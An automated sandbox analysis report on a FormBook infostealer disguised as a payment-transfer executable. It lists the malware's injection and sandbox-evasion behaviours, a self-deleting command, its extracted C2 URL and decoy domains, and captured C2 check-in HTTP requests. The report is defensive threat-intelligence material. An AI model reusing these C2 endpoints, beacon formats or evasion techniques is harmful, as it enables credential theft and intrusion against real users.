Analysis Report Payment Transfer Copy of $274,876.00 for the invoice shipments.exe

Overview

General Information

Sample Name: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Analysis ID: 356535
MD5: 5f1c9c4a7bc24c3d39a5a3834ba7bb8e
SHA1: 0e9a21a75675c636438f50d90bb5f7ec9a689275
SHA256: 5d5d64a87a5d888443e8d7a25046922fa4a39fe5952a45635dd66321e616bb14
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (PID: 6512 cmdline: 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe' MD5: 5F1C9C4A7BC24C3D39A5A3834BA7BB8E)
    • Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (PID: 6840 cmdline: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe MD5: 5F1C9C4A7BC24C3D39A5A3834BA7BB8E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 6224 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 4188 cmdline: /c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jaemagreci.com/blr/"], "decoy": ["cvmjqcid.com", "cubskw.com", "carbeloy.com", "lucascolterneal.com", "robertlainstrom.com", "long9000.com", "drtconseils.com", "keptus.com", "mediamonkeyhouse.com", "outletmihotel.com", "exchangemailboxrepair.com", "kanaai.com", "mountshastajerky.com", "thepettybox.com", "sweetpopntreatz.com", "wpweasel.com", "plumbersinauckland.com", "sevdaduragi.com", "gesunde-ordnung.com", "10751wilshire801.com", "brandmkttx.net", "yoshiyama-potager.com", "na230.com", "kittyninja.net", "eurythmy.net", "circlecitydesign.com", "thesleepinn.com", "olgadalila.com", "happyaiper.com", "supplierdurian.site", "simplymcs.com", "ug-storecards.com", "gannahealing.com", "ginamoney.com", "emilyadkinsonrealtor.com", "tablatiffin.com", "laughinggrassfarm.com", "thebriartowns.com", "youplus.website", "soheilvaseghi.com", "prodhealth.site", "bltck.com", "zomapa.com", "hcssgy.com", "simplyloveoccasions.com", "mdglitzallstars.com", "rck.xyz", "stanchilo.com", "avadl.pro", "astursuites.com", "whowetrust.com", "easpipe.com", "ortopediagalvao.com", "wellhealt.com", "destinyhouseacton.com", "lazyturtletikibar.com", "online-verifieren.net", "jasa-software.com", "tenager365.com", "atgiven.icu", "recette-originale.com", "danielleandnic.com", "kathrynbaierling.com", "emmaxbellecandleco.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x13b3b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13b632:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x1679d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x167c52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x147155:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x173775:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x146c41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x173261:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147257:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x173877:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1473cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x1739ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x13c04a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x16866a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x145ebc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x1724dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x13cd43:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x169363:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x14cdf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x179417:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x14ddfa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, Virustotal: Detection: 25%
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, ReversingLabs: Detection: 27%
          Yara detected FormBook
          Source: Yara match, File source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, Joe Sandbox ML: detected
          Source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          Uses 32bit PE files
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NX
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbols
          Source: Binary string: explorer.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275056959.00000000010DF000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.746780644.0000000004C00000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, explorer.exe
          Source: Binary string: explorer.pdb source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000004.00000002.275433894.0000000002B80000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, Code function: 4x nop then pop edi, 4_2_0040E3A2
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, Code function: 4x nop then pop edi, 4_2_0040E44A
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 4x nop then pop edi, 9_2_0309E3A2
          Source: C:\Windows\SysWOW64\explorer.exe, Code function: 4x nop then pop edi, 9_2_0309E44A

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 50.116.112.43:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49739 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49748 -> 185.199.108.153:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49752 -> 176.74.27.137:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49754 -> 164.155.144.220:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.jaemagreci.com/blr/
          Source: global traffic, HTTP traffic detected: GET /blr/?OhNhA=0qfhgAUhFNnGzH7qGfzqggPFhGYeFRXNcWm+JLPBUuQl5doqjpchYq6utkLPlNOTiwpN&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.kanaai.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /blr/?OhNhA=zy4aJG0RjbOs5fr8AigFVw38GRzAFltiV345BgDRTDlQ98Z37kqPuyHkyXsUwHWJOif+&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.cvmjqcid.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.jaemagreci.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.sweetpopntreatz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.long9000.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.soheilvaseghi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.gannahealing.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.olgadalila.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.zomapa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 35.246.6.109
          Source: Joe Sandbox View, IP Address: 34.102.136.180
          Source: Joe Sandbox View, ASN Name: IDCFIDCFrontierIncJP
          Source: Joe Sandbox View, ASN Name: MULTA-ASN1US
          Source: unknown, DNS traffic detected: queries for: www.kanaai.com
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 23 Feb 2021 08:44:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.com/blr/www.sweetpopntreatz.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jaemagreci.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.com/blr/j
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.jasa-software.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.com/blr/www.cvmjqcid.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kanaai.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.com/blr/www.na230.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.kathrynbaierling.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.com/blr/www.soheilvaseghi.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.long9000.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.com/blr/www.jasa-software.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.na230.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.com/blr/www.zomapa.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.olgadalila.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.site
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.site/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.site/blr/www.stanchilo.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.prodhealth.siteReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.com/blr/www.gannahealing.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.soheilvaseghi.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.com/blr/www.yoshiyama-potager.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.stanchilo.comReferer:
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.com/blr/www.long9000.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.sweetpopntreatz.comReferer:
          Source: explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.com/blr/
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.com/blr/www.kathrynbaierling.com
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.yoshiyama-potager.comReferer:
          Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpString found in binary or memory: http://www.zomapa.com
